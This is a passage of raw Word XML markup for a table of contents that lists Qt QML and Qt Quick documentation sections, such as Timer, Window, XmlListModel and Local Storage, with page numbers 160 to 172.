            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>160</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63" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Timer QML Type</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605363 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>160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64" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Detailed Description</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605364 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>160</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65" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt QML Type</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605365 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>161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66" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Detailed Description</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605366 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>161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67" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Enums</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605367 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>161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68" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605368 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>161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69" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Date/Time Formatters</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605369 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>161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70" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Dynamic Object Creation</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605370 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>162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71" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Other Functions</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605371 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>162</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00385670" w:rsidRPr="00385670" w:rsidRDefault="00385670">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc483605372" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605372 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>162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73" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Important Concepts in Qt Quick</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605373 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>163</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74" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>C++ Extension Points</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605374 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>163</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75" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Additional Qt Quick information:</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605375 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>163</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76" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Window QML Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605376 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>164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77" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Screen QML Type</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605377 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>164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78" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Window QML Type</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605378 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>165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79" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>CloseEvent QML Type</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605379 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>165</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80" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick XmlListModel QML Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605380 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>165</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00385670" w:rsidRPr="00385670" w:rsidRDefault="00385670">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc483605381" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
          </w:rPr>
          <w:t>XmlRole QML Type</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605381 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>166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82" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XmlListModel QML Type</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605382 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>168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83" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Using key XML roles</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605383 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>169</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84" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Local Storage QML Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605384 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>170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85" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Open or create a databaseData</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605385 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>171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86" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>db.changeVersion(from, to, callback(tx))</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605386 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>172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87" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>db.transaction(callback(tx))</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
